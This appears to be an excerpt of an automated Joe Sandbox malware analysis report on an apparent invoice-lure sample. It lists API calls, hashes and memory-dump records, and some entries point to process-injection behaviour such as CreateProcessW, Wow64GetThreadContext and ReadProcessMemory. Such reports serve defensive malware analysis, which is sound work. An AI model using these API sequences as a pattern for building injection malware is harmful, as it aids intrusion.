                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CALL
                                          • API String ID: 0-4196123274
                                          • Opcode ID: 31f79041ba6283071c4b8af3f49d60571bdad53e6355720ab6d22f774a5a2314
                                          • Instruction ID: c803bb07f2a617980fc862d1973d54e65b33ee20ceb4547c7cbfd92c67e19f3b
                                          • Opcode Fuzzy Hash: 31f79041ba6283071c4b8af3f49d60571bdad53e6355720ab6d22f774a5a2314
                                          • Instruction Fuzzy Hash: 8A225B70608301DFD724DF14C454A6AB7E1FF44308F15896EE98AAB3A2D739EC55CB8A
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                          • Instruction ID: 2724e85abdc1188f3097b0ceee28e317ee468c7dcaf0b9eeda237b3ec1003ef0
                                          • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                          • Instruction Fuzzy Hash: CB31C4B1B00506AFC704DF69D891E69B3A4FF48314715822AE519CB3D1EB38F911CB95
                                          APIs
                                          • IsThemeActive.UXTHEME ref: 00404834
                                            • Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
                                            • Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
                                            • Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389
                                            • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
                                            • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A
                                            • Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                            • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                            • Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                            • Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                          • String ID:
                                          • API String ID: 1438897964-0
                                          • Opcode ID: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                          • Instruction ID: 9525eea27cfe2a06ee6bb0b94f8a439f0fec78f72a1223afaaa4f4cc7b3f6ca0
                                          • Opcode Fuzzy Hash: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                          • Instruction Fuzzy Hash: 96118E729143019BC700EF69E80591EBBE8EB95754F10893FF440932B2DB749A49CB9E
                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,00B855C0,?,00000000,00000000), ref: 00B85A51
                                          • RtlExitUserThread.NTDLL(00000000), ref: 00B85B11
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1341114141.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b80000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Thread$CreateExitUser
                                          • String ID:
                                          • API String ID: 4108186749-0
                                          • Opcode ID: 83065cd0163877be948c8c846ed9876939e24b7c01a2fdc0071c0cef50d7ce91
                                          • Instruction ID: 53723d26443d7a25fa0b4435ed12640d1662a76ada8a3b5ace13be3e86ad4915
                                          • Opcode Fuzzy Hash: 83065cd0163877be948c8c846ed9876939e24b7c01a2fdc0071c0cef50d7ce91
                                          • Instruction Fuzzy Hash: 09116A1550CBC24ED737AB288825726AFE0DF63320F1902DAD0908E1F3C2695D08CBA3
                                          APIs
                                            • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                            • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                            • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00C50000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                          • std::exception::exception.LIBCMT ref: 00420DEC
                                          • __CxxThrowException@8.LIBCMT ref: 00420E01
                                            • Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 3902256705-0
                                          • Opcode ID: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                          • Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
                                          • Opcode Fuzzy Hash: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                          • Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD
                                          APIs
                                            • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                          • __lock_file.LIBCMT ref: 004253EB
                                            • Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34
                                          • __fclose_nolock.LIBCMT ref: 004253F6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                          • String ID:
                                          • API String ID: 2800547568-0
                                          • Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                          • Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
                                          • Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                          • Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E
                                          APIs
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00B85D6D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1341114141.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b80000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FreeVirtual
                                          • String ID:
                                          • API String ID: 1263568516-0
                                          • Opcode ID: ead49a88db77857ae9b3032add3cf81cbf728ee01a85d04367318b8ef2298bc9
                                          • Instruction ID: 0693c2d1bc50536e0f90a9fa12bec2b446f95dd79d3b4bd243d4bc48b76bc7b0
                                          • Opcode Fuzzy Hash: ead49a88db77857ae9b3032add3cf81cbf728ee01a85d04367318b8ef2298bc9
                                          • Instruction Fuzzy Hash: 68F0B465A04F04AADB3E3368ED4EFB16AD0E712729F4C41F9AE405A0B39A516C02C742
                                          APIs
                                          • CreateProcessW.KERNEL32(?,00000000), ref: 00E9D69B
                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E9D731
                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00E9D753
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1343224751.0000000000E9B000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9B000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e9b000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                          • String ID:
                                          • API String ID: 2438371351-0
                                          • Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                          • Instruction ID: 640f227e15d7c1dbed9e980eb5bb11c7d05243373a1470b01c8ff0a8e0c84867
                                          • Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                          • Instruction Fuzzy Hash: 0012D024E18658C6EB24DF64D8507DEB232EF68300F1060E9910DEB7A5E77A4F91CF5A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1341114141.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b80000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ba15af03e3d20e36425fe2f6a1b934f659e89eb74aecce965b5b49893f2b530d
                                          • Instruction ID: 1c3bad3f02fc0bffcfa45481fd492bb09fc767efd78bd799cc6b481202ccbf74
                                          • Opcode Fuzzy Hash: ba15af03e3d20e36425fe2f6a1b934f659e89eb74aecce965b5b49893f2b530d
                                          • Instruction Fuzzy Hash: F471063180CF808EC73677288C98675BBE1EB62366F4D46DAD6958B1F3D2718D44C352
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1341114141.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b80000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 160eb17e62320b7bbf337618fe6fc93a6594a99eabeefda2bce19ae1877e2877
                                          • Instruction ID: 7fddb71dde958e39fcb3a6c510ab3baa253fdc7758dd24915aa715b62d13aa7d
                                          • Opcode Fuzzy Hash: 160eb17e62320b7bbf337618fe6fc93a6594a99eabeefda2bce19ae1877e2877
                                          • Instruction Fuzzy Hash: 6331C47090C340CACB35FF68C888739BBE0EBA1760F4C95DAD1859A2F2D6758C04D756
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                                          • Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
                                          • Opcode Fuzzy Hash: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                                          • Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 63a7b8eb75f2e55d05e39e69cc963c8fac173b89f0bfddb654610ad48010f242
                                          • Instruction ID: e277250e627d10e0330490a348a3b32a96e3d7cb5ffc8e96ca57e5c84c001af0
                                          • Opcode Fuzzy Hash: 63a7b8eb75f2e55d05e39e69cc963c8fac173b89f0bfddb654610ad48010f242
                                          • Instruction Fuzzy Hash: 86210072A14A19EBDB108F26E84176E7BB4FB18354F21853FE886C51D0EB38E490D74E
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: debd4a192cd98d234165f3013593147144481ea24bfc443804d127757904428b
                                          • Instruction ID: 03ec0e1ddcc1c42b0f32453fdad85b9eaadac3e2e088d633c8de65ee5d072679
                                          • Opcode Fuzzy Hash: debd4a192cd98d234165f3013593147144481ea24bfc443804d127757904428b
                                          • Instruction Fuzzy Hash: 4111D532A04215ABD714EF28D485C6AB7A9EF85324724812FE905DB3D1DB35FC01C799
                                          APIs
                                            • Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF
                                            • Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                            • Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4
                                            • Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Library$Free$Load__wfsopen_memmove
                                          • String ID:
                                          • API String ID: 1396898556-0
                                          • Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                          • Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
                                          • Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                          • Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                          • Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
                                          • Opcode Fuzzy Hash: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                          • Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 117d4443c8501ce4c8c95a31332936277f53f3a231eaf518ec7fad8777a82f8d
                                          • Instruction ID: 8ac4692a4edd8b950221785d74b091900f33ceedfbe0b692f8040025a9c6a4da
                                          • Opcode Fuzzy Hash: 117d4443c8501ce4c8c95a31332936277f53f3a231eaf518ec7fad8777a82f8d
                                          • Instruction Fuzzy Hash: E90126B26013016EC3209F29D806FA7BBD4AB04360F10853FF61ACA1D1EA79F84087D8
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1341114141.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b80000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: 3f60ead258d986c48c07b4a99279e7b8d7b91b053404810a6fe7c69c1049da74
                                          • Instruction ID: d2ab6bf7235161544814455b574aefdc0fb6155a9d0d7640abbb417958b5a9c6
                                          • Opcode Fuzzy Hash: 3f60ead258d986c48c07b4a99279e7b8d7b91b053404810a6fe7c69c1049da74
                                          • Instruction Fuzzy Hash: 0401806180D340DECB35BB2484497367BF4EF56310F0996DAE285AB1B3D6308C04CB56
                                          APIs
                                          • __lock_file.LIBCMT ref: 004248A6
                                            • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __getptd_noexit__lock_file
                                          • String ID:
                                          • API String ID: 2597487223-0
                                          • Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                          • Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
                                          • Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                          • Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D
                                          APIs
                                          • FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                          • Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
                                          • Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                          • Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84
                                          APIs
                                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                          Memory Dump Source
